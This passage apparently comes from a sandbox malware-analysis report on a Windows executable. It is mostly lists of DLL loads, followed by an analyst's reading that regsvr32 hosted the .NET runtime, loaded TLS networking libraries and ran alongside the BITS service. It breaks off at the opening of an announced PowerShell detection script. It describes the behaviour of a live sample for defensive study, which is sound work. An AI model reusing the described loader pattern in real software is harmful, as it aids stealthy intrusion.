      Source: C:\Users\user\Desktop\8n26gvrXUM.exe   Section loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp   Section loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp   Section loaded: msimg32.dll
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp   Section loaded: version.dll
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp   Section loaded: mpr.dll
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp   Section loaded: edgegdi.dll
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp   Section loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp   Section loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp   Section loaded: textinputframework.dll
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp   Section loaded: coreuicomponents.dll
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp   Section loaded: coremessaging.dll
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp   Section loaded: ntmarta.dll
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp   Section loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp   Section loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp   Section loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp   Section loaded: shfolder.dll
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp   Section loaded: rstrtmgr.dll
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp   Section loaded: ncrypt.dll
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp   Section loaded: ntasn1.dll
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp   Section loaded: textshaping.dll
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp   Section loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp   Section loaded: wldp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp   Section loaded: dwmapi.dll
      Source: C:\Windows\SysWOW64\cmd.exe   Section loaded: apphelp.dll
      Source: C:\Windows\SysWOW64\timeout.exe   Section loaded: version.dll
      Source: C:\Windows\SysWOW64\timeout.exe   Section loaded: edgegdi.dll
      Source: C:\Users\user\Desktop\8n26gvrXUM.exe   Section loaded: edgegdi.dll
      Source: C:\Users\user\Desktop\8n26gvrXUM.exe   Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\8n26gvrXUM.exe   Section loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: msimg32.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: version.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: mpr.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: edgegdi.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: textinputframework.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: coreuicomponents.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: coremessaging.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: ntmarta.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: shfolder.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: rstrtmgr.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: ncrypt.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: ntasn1.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: textshaping.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: wldp.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: sspicli.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: dwmapi.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: explorerframe.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: sfc.dll
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp   Section loaded: sfc_os.dll
      Source: C:\Windows\SysWOW64\regsvr32.exe   Section loaded: apphelp.dll
      Source: C:\Windows\SysWOW64\regsvr32.exe   Section loaded: aclayers.dll
      Source: C:\Windows\SysWOW64\regsvr32.exe   Section loaded: mpr.dll
      Source: C:\Windows\SysWOW64\regsvr32.exe   Section loaded: sfc.dll
      Source: C:\Windows\SysWOW64\regsvr32.exe   Section loaded: sfc_os.dll
      Source: C:\Windows\SysWOW64\regsvr32.exe   Section loaded: edgegdi.dll
      Source: C:\Windows\SysWOW64\regsvr32.exe   Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\regsvr32.exe   Section loaded: uxtheme.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: apphelp.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: aclayers.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: sfc.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: sfc_os.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: edgegdi.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: uxtheme.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: userenv.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: edgegdi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: xmllite.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: wininet.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: kdscli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: mi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: miutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: wmidcom.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: dpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: wbemcomn.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: edgegdi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: xmllite.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: wininet.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: kdscli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: mi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: miutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: wmidcom.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: dpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: wbemcomn.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: apphelp.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: aclayers.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: sfc.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: sfc_os.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: edgegdi.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: uxtheme.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: userenv.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: cryptbase.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: cryptsp.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: amsi.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: wininet.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: mscoree.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: wldp.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: profapi.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: windows.storage.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: rsaenh.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: msasn1.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: mswsock.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: secur32.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: sspicli.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: schannel.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: mskeyprotect.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: ntasn1.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: ncrypt.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: ncryptsslp.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: gpapi.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: cryptnet.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: winnsi.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: winhttp.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: webio.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: dnsapi.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: cabinet.dll
      Source: C:\Windows\System32\regsvr32.exe   Section loaded: wbemcomn.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: edgegdi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: xmllite.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: wininet.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: kdscli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: mi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: miutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: wmidcom.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: dpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   Section loaded: wbemcomn.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: edgegdi.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: esent.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: mi.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: webio.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: es.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exe   Section loaded: mpr.dll
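      Read as a whole, the image loads of the System32 regsvr32.exe are the most telling rows in this listing. regsvr32 is a native utility, yet it loads mscoree.dll followed by vcruntime140_clr0400.dll and ucrtbase_clr0400.dll, which means a .NET runtime was started inside it; that fits the ".NET source code contains very large array initializations" and "Contains functionality to dynamically determine API calls" signatures, and the amsi.dll load is consistent with the .NET 4.8+ runtime submitting in-memory assembly loads to AMSI (the report does not show what the registered provider returned). After the CLR the same process brings in mswsock.dll, schannel.dll, winhttp.dll, webio.dll and dnsapi.dll, i.e. TLS-capable outbound networking, then cabinet.dll and wbemcomn.dll, the latter matching the WMI hardware queries in the signature list. The svchost.exe rows loading qmgr.dll, bitsperf.dll and bitsproxy.dll identify that instance as the BITS service host; the listing alone does not establish who queued a transfer through it, only that it was active while the sample ran. The script below is an added detection example and not part of the Joe Sandbox report: it runs a "native utility starts the CLR, then loads network DLLs in the same process" rule over constructed records shaped like Sysmon Event ID 7 (UtcTime, ProcessId, Image, ImageLoaded). The three watch lists are its own hunting choices and the sample records are made up to mirror the rows above.

```powershell
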